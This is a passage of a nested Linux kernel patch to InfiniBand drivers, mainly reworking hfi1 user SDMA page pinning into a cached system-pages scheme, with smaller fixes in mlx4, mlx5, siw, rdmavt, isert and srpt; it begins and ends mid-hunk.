+-	offset = offset_in_page(base + iovec->offset + iov_offset);
+-	pageidx = (((iovec->offset + iov_offset + base) - (base & PAGE_MASK)) >>
+-		   PAGE_SHIFT);
+-	len = offset + req->info.fragsize > PAGE_SIZE ?
+-		PAGE_SIZE - offset : req->info.fragsize;
+-	len = min((datalen - queued), len);
+-	ret = sdma_txadd_page(pq->dd, &tx->txreq, iovec->pages[pageidx],
+-			      offset, len);
+-	if (ret) {
+-		SDMA_DBG(req, "SDMA txreq add page failed %d\n", ret);
+-		return ret;
+-	}
+-	iov_offset += len;
+-	queued += len;
+-	data_sent += len;
+-	if (unlikely(queued < datalen && pageidx == iovec->npages &&
+-		     req->iov_idx < req->data_iovs - 1)) {
+-		iovec->offset += iov_offset;
+-		iovec = &req->iovs[++req->iov_idx];
+-		iov_offset = 0;
+-	}
+-
+-	*queued_ptr = queued;
+-	*data_sent_ptr = data_sent;
+-	*iov_offset_ptr = iov_offset;
+-	return ret;
+-}
+-
+ static int user_sdma_send_pkts(struct user_sdma_request *req, u16 maxpkts)
+ {
+ 	int ret = 0;
+@@ -769,8 +727,7 @@ static int user_sdma_send_pkts(struct user_sdma_request *req, u16 maxpkts)
+ 		maxpkts = req->info.npkts - req->seqnum;
+ 
+ 	while (npkts < maxpkts) {
+-		u32 datalen = 0, queued = 0, data_sent = 0;
+-		u64 iov_offset = 0;
++		u32 datalen = 0;
+ 
+ 		/*
+ 		 * Check whether any of the completions have come back
+@@ -863,27 +820,17 @@ static int user_sdma_send_pkts(struct user_sdma_request *req, u16 maxpkts)
+ 				goto free_txreq;
+ 		}
+ 
+-		/*
+-		 * If the request contains any data vectors, add up to
+-		 * fragsize bytes to the descriptor.
+-		 */
+-		while (queued < datalen &&
+-		       (req->sent + data_sent) < req->data_len) {
+-			ret = user_sdma_txadd(req, tx, iovec, datalen,
+-					      &queued, &data_sent, &iov_offset);
+-			if (ret)
+-				goto free_txreq;
+-		}
+-		/*
+-		 * The txreq was submitted successfully so we can update
+-		 * the counters.
+-		 */
+ 		req->koffset += datalen;
+ 		if (req_opcode(req->info.ctrl) == EXPECTED)
+ 			req->tidoffset += datalen;
+-		req->sent += data_sent;
+-		if (req->data_len)
+-			iovec->offset += iov_offset;
++		req->sent += datalen;
++		while (datalen) {
++			ret = add_system_pages_to_sdma_packet(req, tx, iovec,
++							      &datalen);
++			if (ret)
++				goto free_txreq;
++			iovec = &req->iovs[req->iov_idx];
++		}
+ 		list_add_tail(&tx->txreq.list, &req->txps);
+ 		/*
+ 		 * It is important to increment this here as it is used to
+@@ -920,133 +867,14 @@ free_tx:
+ static u32 sdma_cache_evict(struct hfi1_user_sdma_pkt_q *pq, u32 npages)
+ {
+ 	struct evict_data evict_data;
++	struct mmu_rb_handler *handler = pq->handler;
+ 
+ 	evict_data.cleared = 0;
+ 	evict_data.target = npages;
+-	hfi1_mmu_rb_evict(pq->handler, &evict_data);
++	hfi1_mmu_rb_evict(handler, &evict_data);
+ 	return evict_data.cleared;
+ }
+ 
+-static int pin_sdma_pages(struct user_sdma_request *req,
+-			  struct user_sdma_iovec *iovec,
+-			  struct sdma_mmu_node *node,
+-			  int npages)
+-{
+-	int pinned, cleared;
+-	struct page **pages;
+-	struct hfi1_user_sdma_pkt_q *pq = req->pq;
+-
+-	pages = kcalloc(npages, sizeof(*pages), GFP_KERNEL);
+-	if (!pages)
+-		return -ENOMEM;
+-	memcpy(pages, node->pages, node->npages * sizeof(*pages));
+-
+-	npages -= node->npages;
+-retry:
+-	if (!hfi1_can_pin_pages(pq->dd, current->mm,
+-				atomic_read(&pq->n_locked), npages)) {
+-		cleared = sdma_cache_evict(pq, npages);
+-		if (cleared >= npages)
+-			goto retry;
+-	}
+-	pinned = hfi1_acquire_user_pages(current->mm,
+-					 ((unsigned long)iovec->iov.iov_base +
+-					 (node->npages * PAGE_SIZE)), npages, 0,
+-					 pages + node->npages);
+-	if (pinned < 0) {
+-		kfree(pages);
+-		return pinned;
+-	}
+-	if (pinned != npages) {
+-		unpin_vector_pages(current->mm, pages, node->npages, pinned);
+-		return -EFAULT;
+-	}
+-	kfree(node->pages);
+-	node->rb.len = iovec->iov.iov_len;
+-	node->pages = pages;
+-	atomic_add(pinned, &pq->n_locked);
+-	return pinned;
+-}
+-
+-static void unpin_sdma_pages(struct sdma_mmu_node *node)
+-{
+-	if (node->npages) {
+-		unpin_vector_pages(mm_from_sdma_node(node), node->pages, 0,
+-				   node->npages);
+-		atomic_sub(node->npages, &node->pq->n_locked);
+-	}
+-}
+-
+-static int pin_vector_pages(struct user_sdma_request *req,
+-			    struct user_sdma_iovec *iovec)
+-{
+-	int ret = 0, pinned, npages;
+-	struct hfi1_user_sdma_pkt_q *pq = req->pq;
+-	struct sdma_mmu_node *node = NULL;
+-	struct mmu_rb_node *rb_node;
+-	struct iovec *iov;
+-	bool extracted;
+-
+-	extracted =
+-		hfi1_mmu_rb_remove_unless_exact(pq->handler,
+-						(unsigned long)
+-						iovec->iov.iov_base,
+-						iovec->iov.iov_len, &rb_node);
+-	if (rb_node) {
+-		node = container_of(rb_node, struct sdma_mmu_node, rb);
+-		if (!extracted) {
+-			atomic_inc(&node->refcount);
+-			iovec->pages = node->pages;
+-			iovec->npages = node->npages;
+-			iovec->node = node;
+-			return 0;
+-		}
+-	}
+-
+-	if (!node) {
+-		node = kzalloc(sizeof(*node), GFP_KERNEL);
+-		if (!node)
+-			return -ENOMEM;
+-
+-		node->rb.addr = (unsigned long)iovec->iov.iov_base;
+-		node->pq = pq;
+-		atomic_set(&node->refcount, 0);
+-	}
+-
+-	iov = &iovec->iov;
+-	npages = num_user_pages((unsigned long)iov->iov_base, iov->iov_len);
+-	if (node->npages < npages) {
+-		pinned = pin_sdma_pages(req, iovec, node, npages);
+-		if (pinned < 0) {
+-			ret = pinned;
+-			goto bail;
+-		}
+-		node->npages += pinned;
+-		npages = node->npages;
+-	}
+-	iovec->pages = node->pages;
+-	iovec->npages = npages;
+-	iovec->node = node;
+-
+-	ret = hfi1_mmu_rb_insert(req->pq->handler, &node->rb);
+-	if (ret) {
+-		iovec->node = NULL;
+-		goto bail;
+-	}
+-	return 0;
+-bail:
+-	unpin_sdma_pages(node);
+-	kfree(node);
+-	return ret;
+-}
+-
+-static void unpin_vector_pages(struct mm_struct *mm, struct page **pages,
+-			       unsigned start, unsigned npages)
+-{
+-	hfi1_release_user_pages(mm, pages + start, npages, false);
+-	kfree(pages);
+-}
+-
+ static int check_header_template(struct user_sdma_request *req,
+ 				 struct hfi1_pkt_header *hdr, u32 lrhlen,
+ 				 u32 datalen)
+@@ -1388,7 +1216,7 @@ static void user_sdma_txreq_cb(struct sdma_txreq *txreq, int status)
+ 	if (req->seqcomp != req->info.npkts - 1)
+ 		return;
+ 
+-	user_sdma_free_request(req, false);
++	user_sdma_free_request(req);
+ 	set_comp_state(pq, cq, req->info.comp_idx, state, status);
+ 	pq_update(pq);
+ }
+@@ -1399,10 +1227,8 @@ static inline void pq_update(struct hfi1_user_sdma_pkt_q *pq)
+ 		wake_up(&pq->wait);
+ }
+ 
+-static void user_sdma_free_request(struct user_sdma_request *req, bool unpin)
++static void user_sdma_free_request(struct user_sdma_request *req)
+ {
+-	int i;
+-
+ 	if (!list_empty(&req->txps)) {
+ 		struct sdma_txreq *t, *p;
+ 
+@@ -1415,21 +1241,6 @@ static void user_sdma_free_request(struct user_sdma_request *req, bool unpin)
+ 		}
+ 	}
+ 
+-	for (i = 0; i < req->data_iovs; i++) {
+-		struct sdma_mmu_node *node = req->iovs[i].node;
+-
+-		if (!node)
+-			continue;
+-
+-		req->iovs[i].node = NULL;
+-
+-		if (unpin)
+-			hfi1_mmu_rb_remove(req->pq->handler,
+-					   &node->rb);
+-		else
+-			atomic_dec(&node->refcount);
+-	}
+-
+ 	kfree(req->tids);
+ 	clear_bit(req->info.comp_idx, req->pq->req_in_use);
+ }
+@@ -1447,6 +1258,368 @@ static inline void set_comp_state(struct hfi1_user_sdma_pkt_q *pq,
+ 					idx, state, ret);
+ }
+ 
++static void unpin_vector_pages(struct mm_struct *mm, struct page **pages,
++			       unsigned int start, unsigned int npages)
++{
++	hfi1_release_user_pages(mm, pages + start, npages, false);
++	kfree(pages);
++}
++
++static void free_system_node(struct sdma_mmu_node *node)
++{
++	if (node->npages) {
++		unpin_vector_pages(mm_from_sdma_node(node), node->pages, 0,
++				   node->npages);
++		atomic_sub(node->npages, &node->pq->n_locked);
++	}
++	kfree(node);
++}
++
++static inline void acquire_node(struct sdma_mmu_node *node)
++{
++	atomic_inc(&node->refcount);
++	WARN_ON(atomic_read(&node->refcount) < 0);
++}
++
++static inline void release_node(struct mmu_rb_handler *handler,
++				struct sdma_mmu_node *node)
++{
++	atomic_dec(&node->refcount);
++	WARN_ON(atomic_read(&node->refcount) < 0);
++}
++
++static struct sdma_mmu_node *find_system_node(struct mmu_rb_handler *handler,
++					      unsigned long start,
++					      unsigned long end)
++{
++	struct mmu_rb_node *rb_node;
++	struct sdma_mmu_node *node;
++	unsigned long flags;
++
++	spin_lock_irqsave(&handler->lock, flags);
++	rb_node = hfi1_mmu_rb_get_first(handler, start, (end - start));
++	if (!rb_node) {
++		spin_unlock_irqrestore(&handler->lock, flags);
++		return NULL;
++	}
++	node = container_of(rb_node, struct sdma_mmu_node, rb);
++	acquire_node(node);
++	spin_unlock_irqrestore(&handler->lock, flags);
++
++	return node;
++}
++
++static int pin_system_pages(struct user_sdma_request *req,
++			    uintptr_t start_address, size_t length,
++			    struct sdma_mmu_node *node, int npages)
++{
++	struct hfi1_user_sdma_pkt_q *pq = req->pq;
++	int pinned, cleared;
++	struct page **pages;
++
++	pages = kcalloc(npages, sizeof(*pages), GFP_KERNEL);
++	if (!pages)
++		return -ENOMEM;
++
++retry:
++	if (!hfi1_can_pin_pages(pq->dd, current->mm, atomic_read(&pq->n_locked),
++				npages)) {
++		SDMA_DBG(req, "Evicting: nlocked %u npages %u",
++			 atomic_read(&pq->n_locked), npages);
++		cleared = sdma_cache_evict(pq, npages);
++		if (cleared >= npages)
++			goto retry;
++	}
++
++	SDMA_DBG(req, "Acquire user pages start_address %lx node->npages %u npages %u",
++		 start_address, node->npages, npages);
++	pinned = hfi1_acquire_user_pages(current->mm, start_address, npages, 0,
++					 pages);
++
++	if (pinned < 0) {
++		kfree(pages);
++		SDMA_DBG(req, "pinned %d", pinned);
++		return pinned;
++	}
++	if (pinned != npages) {
++		unpin_vector_pages(current->mm, pages, node->npages, pinned);
++		SDMA_DBG(req, "npages %u pinned %d", npages, pinned);
++		return -EFAULT;
++	}
++	node->rb.addr = start_address;
++	node->rb.len = length;
++	node->pages = pages;
++	node->npages = npages;
++	atomic_add(pinned, &pq->n_locked);
++	SDMA_DBG(req, "done. pinned %d", pinned);
++	return 0;
++}
++
++static int add_system_pinning(struct user_sdma_request *req,
++			      struct sdma_mmu_node **node_p,
++			      unsigned long start, unsigned long len)
++
++{
++	struct hfi1_user_sdma_pkt_q *pq = req->pq;
++	struct sdma_mmu_node *node;
++	int ret;
++
++	node = kzalloc(sizeof(*node), GFP_KERNEL);
++	if (!node)
++		return -ENOMEM;
++
++	node->pq = pq;
++	ret = pin_system_pages(req, start, len, node, PFN_DOWN(len));
++	if (ret == 0) {
++		ret = hfi1_mmu_rb_insert(pq->handler, &node->rb);
++		if (ret)
++			free_system_node(node);
++		else
++			*node_p = node;
++
++		return ret;
++	}
++
++	kfree(node);
++	return ret;
++}
++
++static int get_system_cache_entry(struct user_sdma_request *req,
++				  struct sdma_mmu_node **node_p,
++				  size_t req_start, size_t req_len)
++{
++	struct hfi1_user_sdma_pkt_q *pq = req->pq;
++	u64 start = ALIGN_DOWN(req_start, PAGE_SIZE);
++	u64 end = PFN_ALIGN(req_start + req_len);
++	struct mmu_rb_handler *handler = pq->handler;
++	int ret;
++
++	if ((end - start) == 0) {
++		SDMA_DBG(req,
++			 "Request for empty cache entry req_start %lx req_len %lx start %llx end %llx",
++			 req_start, req_len, start, end);
++		return -EINVAL;
++	}
++
++	SDMA_DBG(req, "req_start %lx req_len %lu", req_start, req_len);
++
++	while (1) {
++		struct sdma_mmu_node *node =
++			find_system_node(handler, start, end);
++		u64 prepend_len = 0;
++
++		SDMA_DBG(req, "node %p start %llx end %llu", node, start, end);
++		if (!node) {
++			ret = add_system_pinning(req, node_p, start,
++						 end - start);
++			if (ret == -EEXIST) {
++				/*
++				 * Another execution context has inserted a
++				 * conficting entry first.
++				 */
++				continue;
++			}
++			return ret;
++		}
++
++		if (node->rb.addr <= start) {
++			/*
++			 * This entry covers at least part of the region. If it doesn't extend
++			 * to the end, then this will be called again for the next segment.
++			 */
++			*node_p = node;
++			return 0;
++		}
++
++		SDMA_DBG(req, "prepend: node->rb.addr %lx, node->refcount %d",
++			 node->rb.addr, atomic_read(&node->refcount));
++		prepend_len = node->rb.addr - start;
++
++		/*
++		 * This node will not be returned, instead a new node
++		 * will be. So release the reference.
++		 */
++		release_node(handler, node);
++
++		/* Prepend a node to cover the beginning of the allocation */
++		ret = add_system_pinning(req, node_p, start, prepend_len);
++		if (ret == -EEXIST) {
++			/* Another execution context has inserted a conficting entry first. */
++			continue;
++		}
++		return ret;
++	}
++}
++
++static int add_mapping_to_sdma_packet(struct user_sdma_request *req,
++				      struct user_sdma_txreq *tx,
++				      struct sdma_mmu_node *cache_entry,
++				      size_t start,
++				      size_t from_this_cache_entry)
++{
++	struct hfi1_user_sdma_pkt_q *pq = req->pq;
++	unsigned int page_offset;
++	unsigned int from_this_page;
++	size_t page_index;
++	void *ctx;
++	int ret;
++
++	/*
++	 * Because the cache may be more fragmented than the memory that is being accessed,
++	 * it's not strictly necessary to have a descriptor per cache entry.
++	 */
++
++	while (from_this_cache_entry) {
++		page_index = PFN_DOWN(start - cache_entry->rb.addr);
++
++		if (page_index >= cache_entry->npages) {
++			SDMA_DBG(req,
++				 "Request for page_index %zu >= cache_entry->npages %u",
++				 page_index, cache_entry->npages);
++			return -EINVAL;
++		}
++
++		page_offset = start - ALIGN_DOWN(start, PAGE_SIZE);
++		from_this_page = PAGE_SIZE - page_offset;
++
++		if (from_this_page < from_this_cache_entry) {
++			ctx = NULL;
++		} else {
++			/*
++			 * In the case they are equal the next line has no practical effect,
++			 * but it's better to do a register to register copy than a conditional
++			 * branch.
++			 */
++			from_this_page = from_this_cache_entry;
++			ctx = cache_entry;
++		}
++
++		ret = sdma_txadd_page(pq->dd, ctx, &tx->txreq,
++				      cache_entry->pages[page_index],
++				      page_offset, from_this_page);
++		if (ret) {
++			/*
++			 * When there's a failure, the entire request is freed by
++			 * user_sdma_send_pkts().
++			 */
++			SDMA_DBG(req,
++				 "sdma_txadd_page failed %d page_index %lu page_offset %u from_this_page %u",
++				 ret, page_index, page_offset, from_this_page);
++			return ret;
++		}
++		start += from_this_page;
++		from_this_cache_entry -= from_this_page;
++	}
++	return 0;
++}
++
++static int add_system_iovec_to_sdma_packet(struct user_sdma_request *req,
++					   struct user_sdma_txreq *tx,
++					   struct user_sdma_iovec *iovec,
++					   size_t from_this_iovec)
++{
++	struct mmu_rb_handler *handler = req->pq->handler;
++
++	while (from_this_iovec > 0) {
++		struct sdma_mmu_node *cache_entry;
++		size_t from_this_cache_entry;
++		size_t start;
++		int ret;
++
++		start = (uintptr_t)iovec->iov.iov_base + iovec->offset;
++		ret = get_system_cache_entry(req, &cache_entry, start,
++					     from_this_iovec);
++		if (ret) {
++			SDMA_DBG(req, "pin system segment failed %d", ret);
++			return ret;
++		}
++
++		from_this_cache_entry = cache_entry->rb.len - (start - cache_entry->rb.addr);
++		if (from_this_cache_entry > from_this_iovec)
++			from_this_cache_entry = from_this_iovec;
++
++		ret = add_mapping_to_sdma_packet(req, tx, cache_entry, start,
++						 from_this_cache_entry);
++		if (ret) {
++			/*
++			 * We're guaranteed that there will be no descriptor
++			 * completion callback that releases this node
++			 * because only the last descriptor referencing it
++			 * has a context attached, and a failure means the
++			 * last descriptor was never added.
++			 */
++			release_node(handler, cache_entry);
++			SDMA_DBG(req, "add system segment failed %d", ret);
++			return ret;
++		}
++
++		iovec->offset += from_this_cache_entry;
++		from_this_iovec -= from_this_cache_entry;
++	}
++
++	return 0;
++}
++
++static int add_system_pages_to_sdma_packet(struct user_sdma_request *req,
++					   struct user_sdma_txreq *tx,
++					   struct user_sdma_iovec *iovec,
++					   u32 *pkt_data_remaining)
++{
++	size_t remaining_to_add = *pkt_data_remaining;
++	/*
++	 * Walk through iovec entries, ensure the associated pages
++	 * are pinned and mapped, add data to the packet until no more
++	 * data remains to be added.
++	 */
++	while (remaining_to_add > 0) {
++		struct user_sdma_iovec *cur_iovec;
++		size_t from_this_iovec;
++		int ret;
++
++		cur_iovec = iovec;
++		from_this_iovec = iovec->iov.iov_len - iovec->offset;
++
++		if (from_this_iovec > remaining_to_add) {
++			from_this_iovec = remaining_to_add;
++		} else {
++			/* The current iovec entry will be consumed by this pass. */
++			req->iov_idx++;
++			iovec++;
++		}
++
++		ret = add_system_iovec_to_sdma_packet(req, tx, cur_iovec,
++						      from_this_iovec);
++		if (ret)
++			return ret;
++
++		remaining_to_add -= from_this_iovec;
++	}
++	*pkt_data_remaining = remaining_to_add;
++
++	return 0;
++}
++
++void system_descriptor_complete(struct hfi1_devdata *dd,
++				struct sdma_desc *descp)
++{
++	switch (sdma_mapping_type(descp)) {
++	case SDMA_MAP_SINGLE:
++		dma_unmap_single(&dd->pcidev->dev, sdma_mapping_addr(descp),
++				 sdma_mapping_len(descp), DMA_TO_DEVICE);
++		break;
++	case SDMA_MAP_PAGE:
++		dma_unmap_page(&dd->pcidev->dev, sdma_mapping_addr(descp),
++			       sdma_mapping_len(descp), DMA_TO_DEVICE);
++		break;
++	}
++
++	if (descp->pinning_ctx) {
++		struct sdma_mmu_node *node = descp->pinning_ctx;
++
++		release_node(node->rb.handler, node);
++	}
++}
++
+ static bool sdma_rb_filter(struct mmu_rb_node *node, unsigned long addr,
+ 			   unsigned long len)
+ {
+@@ -1493,8 +1666,7 @@ static void sdma_rb_remove(void *arg, struct mmu_rb_node *mnode)
+ 	struct sdma_mmu_node *node =
+ 		container_of(mnode, struct sdma_mmu_node, rb);
+ 
+-	unpin_sdma_pages(node);
+-	kfree(node);
++	free_system_node(node);
+ }
+ 
+ static int sdma_rb_invalidate(void *arg, struct mmu_rb_node *mnode)
+diff --git a/drivers/infiniband/hw/hfi1/user_sdma.h b/drivers/infiniband/hw/hfi1/user_sdma.h
+index ea56eb57e6568..a241836371dc1 100644
+--- a/drivers/infiniband/hw/hfi1/user_sdma.h
++++ b/drivers/infiniband/hw/hfi1/user_sdma.h
+@@ -112,16 +112,11 @@ struct sdma_mmu_node {
+ struct user_sdma_iovec {
+ 	struct list_head list;
+ 	struct iovec iov;
+-	/* number of pages in this vector */
+-	unsigned int npages;
+-	/* array of pinned pages for this vector */
+-	struct page **pages;
+ 	/*
+ 	 * offset into the virtual address space of the vector at
+ 	 * which we last left off.
+ 	 */
+ 	u64 offset;
+-	struct sdma_mmu_node *node;
+ };
+ 
+ /* evict operation argument */
+diff --git a/drivers/infiniband/hw/hfi1/verbs.c b/drivers/infiniband/hw/hfi1/verbs.c
+index e6e17984553c0..39ca32d9ae6a5 100644
+--- a/drivers/infiniband/hw/hfi1/verbs.c
++++ b/drivers/infiniband/hw/hfi1/verbs.c
+@@ -778,8 +778,8 @@ static int build_verbs_tx_desc(
+ 
+ 	/* add icrc, lt byte, and padding to flit */
+ 	if (extra_bytes)
+-		ret = sdma_txadd_daddr(sde->dd, &tx->txreq,
+-				       sde->dd->sdma_pad_phys, extra_bytes);
++		ret = sdma_txadd_daddr(sde->dd, &tx->txreq, sde->dd->sdma_pad_phys,
++				       extra_bytes);
+ 
+ bail_txadd:
+ 	return ret;
+diff --git a/drivers/infiniband/hw/hfi1/vnic_sdma.c b/drivers/infiniband/hw/hfi1/vnic_sdma.c
+index c3f0f8d877c37..727eedfba332a 100644
+--- a/drivers/infiniband/hw/hfi1/vnic_sdma.c
++++ b/drivers/infiniband/hw/hfi1/vnic_sdma.c
+@@ -64,6 +64,7 @@ static noinline int build_vnic_ulp_payload(struct sdma_engine *sde,
+ 
+ 		/* combine physically continuous fragments later? */
+ 		ret = sdma_txadd_page(sde->dd,
++				      NULL,
+ 				      &tx->txreq,
+ 				      skb_frag_page(frag),
+ 				      skb_frag_off(frag),
+diff --git a/drivers/infiniband/hw/mlx4/qp.c b/drivers/infiniband/hw/mlx4/qp.c
+index b17d6ebc5b705..488c906c0432c 100644
+--- a/drivers/infiniband/hw/mlx4/qp.c
++++ b/drivers/infiniband/hw/mlx4/qp.c
+@@ -412,9 +412,13 @@ static int set_user_sq_size(struct mlx4_ib_dev *dev,
+ 			    struct mlx4_ib_qp *qp,
+ 			    struct mlx4_ib_create_qp *ucmd)
+ {
++	u32 cnt;
++
+ 	/* Sanity check SQ size before proceeding */
+-	if ((1 << ucmd->log_sq_bb_count) > dev->dev->caps.max_wqes	 ||
+-	    ucmd->log_sq_stride >
++	if (check_shl_overflow(1, ucmd->log_sq_bb_count, &cnt) ||
++	    cnt > dev->dev->caps.max_wqes)
++		return -EINVAL;
++	if (ucmd->log_sq_stride >
+ 		ilog2(roundup_pow_of_two(dev->dev->caps.max_sq_desc_sz)) ||
+ 	    ucmd->log_sq_stride < MLX4_IB_MIN_SQ_STRIDE)
+ 		return -EINVAL;
+diff --git a/drivers/infiniband/hw/mlx5/devx.c b/drivers/infiniband/hw/mlx5/devx.c
+index 2211a0be16f36..f8e2baed27a5c 100644
+--- a/drivers/infiniband/hw/mlx5/devx.c
++++ b/drivers/infiniband/hw/mlx5/devx.c
+@@ -666,7 +666,21 @@ static bool devx_is_valid_obj_id(struct uverbs_attr_bundle *attrs,
+ 				      obj_id;
+ 
+ 	case MLX5_IB_OBJECT_DEVX_OBJ:
+-		return ((struct devx_obj *)uobj->object)->obj_id == obj_id;
++	{
++		u16 opcode = MLX5_GET(general_obj_in_cmd_hdr, in, opcode);
++		struct devx_obj *devx_uobj = uobj->object;
++
++		if (opcode == MLX5_CMD_OP_QUERY_FLOW_COUNTER &&
++		    devx_uobj->flow_counter_bulk_size) {
++			u64 end;
++
++			end = devx_uobj->obj_id +
++				devx_uobj->flow_counter_bulk_size;
++			return devx_uobj->obj_id <= obj_id && end > obj_id;
++		}
++
++		return devx_uobj->obj_id == obj_id;
++	}
+ 
+ 	default:
+ 		return false;
+@@ -1517,10 +1531,17 @@ static int UVERBS_HANDLER(MLX5_IB_METHOD_DEVX_OBJ_CREATE)(
+ 		goto obj_free;
+ 
+ 	if (opcode == MLX5_CMD_OP_ALLOC_FLOW_COUNTER) {
+-		u8 bulk = MLX5_GET(alloc_flow_counter_in,
+-				   cmd_in,
+-				   flow_counter_bulk);
+-		obj->flow_counter_bulk_size = 128UL * bulk;
++		u32 bulk = MLX5_GET(alloc_flow_counter_in,
++				    cmd_in,
++				    flow_counter_bulk_log_size);
++
++		if (bulk)
++			bulk = 1 << bulk;
++		else
++			bulk = 128UL * MLX5_GET(alloc_flow_counter_in,
++						cmd_in,
++						flow_counter_bulk);
++		obj->flow_counter_bulk_size = bulk;
+ 	}
+ 
+ 	uobj->object = obj;
+diff --git a/drivers/infiniband/hw/mlx5/qp.c b/drivers/infiniband/hw/mlx5/qp.c
+index cf953d23d18da..f7d3643b08f50 100644
+--- a/drivers/infiniband/hw/mlx5/qp.c
++++ b/drivers/infiniband/hw/mlx5/qp.c
+@@ -4408,7 +4408,7 @@ static int mlx5_ib_modify_dct(struct ib_qp *ibqp, struct ib_qp_attr *attr,
+ 			return -EINVAL;
+ 
+ 		if (attr->port_num == 0 ||
+-		    attr->port_num > MLX5_CAP_GEN(dev->mdev, num_ports)) {
++		    attr->port_num > dev->num_ports) {
+ 			mlx5_ib_dbg(dev, "invalid port number %d. number of ports is %d\n",
+ 				    attr->port_num, dev->num_ports);
+ 			return -EINVAL;
+diff --git a/drivers/infiniband/hw/mlx5/umr.c b/drivers/infiniband/hw/mlx5/umr.c
+index d5105b5c9979b..cb5cee3dee2b6 100644
+--- a/drivers/infiniband/hw/mlx5/umr.c
++++ b/drivers/infiniband/hw/mlx5/umr.c
+@@ -380,6 +380,9 @@ static void mlx5r_umr_set_access_flags(struct mlx5_ib_dev *dev,
+ 				       struct mlx5_mkey_seg *seg,
+ 				       unsigned int access_flags)
+ {
++	bool ro_read = (access_flags & IB_ACCESS_RELAXED_ORDERING) &&
++		       pcie_relaxed_ordering_enabled(dev->mdev->pdev);
++
+ 	MLX5_SET(mkc, seg, a, !!(access_flags & IB_ACCESS_REMOTE_ATOMIC));
+ 	MLX5_SET(mkc, seg, rw, !!(access_flags & IB_ACCESS_REMOTE_WRITE));
+ 	MLX5_SET(mkc, seg, rr, !!(access_flags & IB_ACCESS_REMOTE_READ));
+@@ -387,8 +390,7 @@ static void mlx5r_umr_set_access_flags(struct mlx5_ib_dev *dev,
+ 	MLX5_SET(mkc, seg, lr, 1);
+ 	MLX5_SET(mkc, seg, relaxed_ordering_write,
+ 		 !!(access_flags & IB_ACCESS_RELAXED_ORDERING));
+-	MLX5_SET(mkc, seg, relaxed_ordering_read,
+-		 !!(access_flags & IB_ACCESS_RELAXED_ORDERING));
++	MLX5_SET(mkc, seg, relaxed_ordering_read, ro_read);
+ }
+ 
+ int mlx5r_umr_rereg_pd_access(struct mlx5_ib_mr *mr, struct ib_pd *pd,
+diff --git a/drivers/infiniband/sw/rdmavt/qp.c b/drivers/infiniband/sw/rdmavt/qp.c
+index 3acab569fbb94..2bdc4486c3daa 100644
+--- a/drivers/infiniband/sw/rdmavt/qp.c
++++ b/drivers/infiniband/sw/rdmavt/qp.c
+@@ -464,8 +464,6 @@ void rvt_qp_exit(struct rvt_dev_info *rdi)
+ 	if (qps_inuse)
+ 		rvt_pr_err(rdi, "QP memory leak! %u still in use\n",
+ 			   qps_inuse);
+-	if (!rdi->qp_dev)
+-		return;
+ 
+ 	kfree(rdi->qp_dev->qp_table);
+ 	free_qpn_table(&rdi->qp_dev->qpn_table);
+diff --git a/drivers/infiniband/sw/siw/siw_main.c b/drivers/infiniband/sw/siw/siw_main.c
+index dacc174604bf2..65b5cda5457ba 100644
+--- a/drivers/infiniband/sw/siw/siw_main.c
++++ b/drivers/infiniband/sw/siw/siw_main.c
+@@ -437,9 +437,6 @@ static int siw_netdev_event(struct notifier_block *nb, unsigned long event,
+ 
+ 	dev_dbg(&netdev->dev, "siw: event %lu\n", event);
+ 
+-	if (dev_net(netdev) != &init_net)
+-		return NOTIFY_OK;
+-
+ 	base_dev = ib_device_get_by_netdev(netdev, RDMA_DRIVER_SIW);
+ 	if (!base_dev)
+ 		return NOTIFY_OK;
+diff --git a/drivers/infiniband/sw/siw/siw_qp_tx.c b/drivers/infiniband/sw/siw/siw_qp_tx.c
+index 05052b49107f2..6bb9e9e81ff4c 100644
+--- a/drivers/infiniband/sw/siw/siw_qp_tx.c
++++ b/drivers/infiniband/sw/siw/siw_qp_tx.c
+@@ -558,7 +558,7 @@ static int siw_tx_hdt(struct siw_iwarp_tx *c_tx, struct socket *s)
+ 			data_len -= plen;
+ 			fp_off = 0;
+ 
+-			if (++seg > (int)MAX_ARRAY) {
++			if (++seg >= (int)MAX_ARRAY) {
+ 				siw_dbg_qp(tx_qp(c_tx), "to many fragments\n");
+ 				siw_unmap_pages(iov, kmap_mask, seg-1);
+ 				wqe->processed -= c_tx->bytes_unsent;
+diff --git a/drivers/infiniband/ulp/isert/ib_isert.c b/drivers/infiniband/ulp/isert/ib_isert.c
+index b360a1527cd10..7cca171478a22 100644
+--- a/drivers/infiniband/ulp/isert/ib_isert.c
++++ b/drivers/infiniband/ulp/isert/ib_isert.c
+@@ -2507,8 +2507,8 @@ isert_wait4cmds(struct iscsit_conn *conn)
+ 	isert_info("iscsit_conn %p\n", conn);
+ 
+ 	if (conn->sess) {
+-		target_stop_session(conn->sess->se_sess);
+-		target_wait_for_sess_cmds(conn->sess->se_sess);
++		target_stop_cmd_counter(conn->cmd_cnt);
++		target_wait_for_cmds(conn->cmd_cnt);
+ 	}
+ }
+ 
+diff --git a/drivers/infiniband/ulp/srpt/ib_srpt.c b/drivers/infiniband/ulp/srpt/ib_srpt.c
+index 3c3fae738c3ed..25e799dba999e 100644
+--- a/drivers/infiniband/ulp/srpt/ib_srpt.c
++++ b/drivers/infiniband/ulp/srpt/ib_srpt.c
+@@ -549,6 +549,7 @@ static int srpt_format_guid(char *buf, unsigned int size, const __be64 *guid)
+  */
+ static int srpt_refresh_port(struct srpt_port *sport)
+ {
++	struct ib_mad_agent *mad_agent;
+ 	struct ib_mad_reg_req reg_req;
+ 	struct ib_port_modify port_modify;
+ 	struct ib_port_attr port_attr;
+@@ -593,24 +594,26 @@ static int srpt_refresh_port(struct srpt_port *sport)
+ 		set_bit(IB_MGMT_METHOD_GET, reg_req.method_mask);
+ 		set_bit(IB_MGMT_METHOD_SET, reg_req.method_mask);
+ 
+-		sport->mad_agent = ib_register_mad_agent(sport->sdev->device,
+-							 sport->port,
+-							 IB_QPT_GSI,
+-							 &reg_req, 0,
+-							 srpt_mad_send_handler,
+-							 srpt_mad_recv_handler,
+-							 sport, 0);
+-		if (IS_ERR(sport->mad_agent)) {
++		mad_agent = ib_register_mad_agent(sport->sdev->device,
++						  sport->port,
++						  IB_QPT_GSI,
++						  &reg_req, 0,
++						  srpt_mad_send_handler,
++						  srpt_mad_recv_handler,
++						  sport, 0);
++		if (IS_ERR(mad_agent)) {
+ 			pr_err("%s-%d: MAD agent registration failed (%ld). Note: this is expected if SR-IOV is enabled.\n",
+ 			       dev_name(&sport->sdev->device->dev), sport->port,
+-			       PTR_ERR(sport->mad_agent));
++			       PTR_ERR(mad_agent));
